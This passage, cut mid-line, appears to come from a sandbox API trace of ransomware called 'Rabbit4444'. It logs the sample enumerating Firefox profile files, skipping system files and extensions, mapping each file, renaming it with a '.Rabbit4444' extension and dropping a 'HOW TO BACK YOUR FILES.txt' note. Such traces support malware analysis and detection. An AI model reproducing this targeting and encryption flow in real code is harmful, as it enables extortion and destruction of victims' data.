TO BACK YOUR FILES.txt") returned 1 [0052.098] lstrcmpiW (lpString1="manifest.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="Rabbit4444.exe") returned -1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2=".") returned 1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="..") returned 1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="windows") returned -1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="bootmgr") returned 1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="pagefile.sys") returned -1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="boot") returned 1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="ids.txt") returned 1 [0052.099] lstrcmpiW (lpString1="manifest.json", lpString2="NTUSER.DAT") returned -1 [0052.099] lstrcpyW (in: lpString1=0x130ec00, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0052.099] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json", dwFileAttributes=0x0) returned 1 [0052.099] lstrlenW (lpString="manifest.json") returned 13 [0052.099] lstrlenW (lpString="Rabbit4444") returned 10 [0052.100] lstrcmpiW (lpString1="ifest.json", lpString2="Rabbit4444") returned -1 [0052.100] lstrlenW (lpString=".dll") returned 4 [0052.100] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0052.100] lstrlenW (lpString=".lnk") returned 4 [0052.100] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0052.100] lstrlenW (lpString=".ini") returned 4 [0052.100] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0052.100] lstrlenW (lpString=".sys") returned 4 [0052.100] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0052.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.100] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.100] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14341069527) returned 1 [0052.100] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=348) returned 1 [0052.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0052.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0052.100] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x298 [0052.102] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x70000 [0052.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0052.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0052.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0052.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0052.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14341354670) returned 1 [0052.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0052.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0052.103] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.103] CloseHandle (hObject=0x298) returned 1 [0052.103] CloseHandle (hObject=0x278) returned 1 [0052.103] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.Rabbit4444") returned 124 [0052.103] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.rabbit4444"), dwFlags=0x1) returned 1 [0052.104] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afcaea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x58adf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="widevinecdm.dll", cAlternateFileName="WIDEVI~1.DLL")) returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="Rabbit4444.exe") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2=".") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="..") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="windows") returned -1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="bootmgr") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="pagefile.sys") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="boot") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="ids.txt") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="NTUSER.DAT") returned 1 [0052.104] lstrcpyW (in: lpString1=0x130ec00, lpString2="widevinecdm.dll" | out: lpString1="widevinecdm.dll") returned="widevinecdm.dll" [0052.104] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll", dwFileAttributes=0x0) returned 1 [0052.104] lstrlenW (lpString="widevinecdm.dll") returned 15 [0052.104] lstrlenW (lpString="Rabbit4444") returned 10 [0052.104] lstrcmpiW (lpString1="inecdm.dll", lpString2="Rabbit4444") returned -1 [0052.104] lstrlenW (lpString=".dll") returned 4 [0052.104] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0052.104] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afb75b, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="widevinecdm.dll.lib", cAlternateFileName="WIDEVI~1.LIB")) returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.104] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="Rabbit4444.exe") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2=".") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="..") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="windows") returned -1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="bootmgr") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="pagefile.sys") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="boot") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ids.txt") returned 1 [0052.105] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="NTUSER.DAT") returned 1 [0052.105] lstrcpyW (in: lpString1=0x130ec00, lpString2="widevinecdm.dll.lib" | out: lpString1="widevinecdm.dll.lib") returned="widevinecdm.dll.lib" [0052.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib", dwFileAttributes=0x0) returned 1 [0052.105] lstrlenW (lpString="widevinecdm.dll.lib") returned 19 [0052.105] lstrlenW (lpString="Rabbit4444") returned 10 [0052.105] lstrcmpiW (lpString1="dm.dll.lib", lpString2="Rabbit4444") returned -1 [0052.105] lstrlenW (lpString=".dll") returned 4 [0052.105] lstrcmpiW (lpString1=".lib", lpString2=".dll") returned 1 [0052.105] lstrlenW (lpString=".lnk") returned 4 [0052.105] lstrcmpiW (lpString1=".lib", lpString2=".lnk") returned -1 [0052.105] lstrlenW (lpString=".ini") returned 4 [0052.105] lstrcmpiW (lpString1=".lib", lpString2=".ini") returned 1 [0052.105] lstrlenW (lpString=".sys") returned 4 [0052.105] lstrcmpiW (lpString1=".lib", lpString2=".sys") returned -1 [0052.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.105] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.105] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14341624004) returned 1 [0052.106] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2456) returned 1 [0052.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0052.106] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0052.106] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca0, lpName=0x0) returned 0x298 [0052.107] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca0) returned 0x70000 [0052.107] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.107] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.107] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.107] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0052.107] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0052.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.108] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14341860018) returned 1 [0052.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0052.108] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.108] CloseHandle (hObject=0x298) returned 1 [0052.108] CloseHandle (hObject=0x278) returned 1 [0052.108] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.Rabbit4444") returned 130 [0052.108] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.rabbit4444"), dwFlags=0x1) returned 1 [0052.109] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afb75b, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="widevinecdm.dll.lib", cAlternateFileName="WIDEVI~1.LIB")) returned 0 [0052.109] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.109] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.109] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.110] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.110] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.110] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.110] CloseHandle (hObject=0x278) returned 1 [0052.110] CloseHandle (hObject=0x27c) returned 1 [0052.110] GetCurrentThreadId () returned 0xd98 [0052.110] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0052.111] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264" [0052.111] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0052.111] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0052.111] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264" [0052.111] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\" [0052.111] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3" [0052.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.116] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.118] FlushFileBuffers (hFile=0x27c) returned 1 [0052.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.119] CloseHandle (hObject=0x27c) returned 1 [0052.120] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264") returned 89 [0052.120] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.120] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c4b15, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe86310e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0052.120] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.120] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.120] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.120] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.120] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c4b15, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe86310e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.120] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.120] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.120] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.120] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.120] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.120] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe86310e5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe86310e5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe86310e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.120] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.120] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.120] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40e6e0c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.6", cAlternateFileName="")) returned 1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="Rabbit4444.exe") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2=".") returned 1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="..") returned 1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="windows") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="bootmgr") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="pagefile.sys") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="boot") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="ids.txt") returned -1 [0052.121] lstrcmpiW (lpString1="1.6", lpString2="NTUSER.DAT") returned -1 [0052.121] lstrcpyW (in: lpString1=0x130ebec, lpString2="1.6" | out: lpString1="1.6") returned="1.6" [0052.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.121] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xef950 [0052.121] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6430 [0052.121] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40e6e0c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.6", cAlternateFileName="")) returned 0 [0052.121] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0052.121] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.123] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.123] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.123] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.123] CloseHandle (hObject=0x278) returned 1 [0052.123] CloseHandle (hObject=0x27c) returned 1 [0052.123] GetCurrentThreadId () returned 0xd98 [0052.123] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.123] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6") 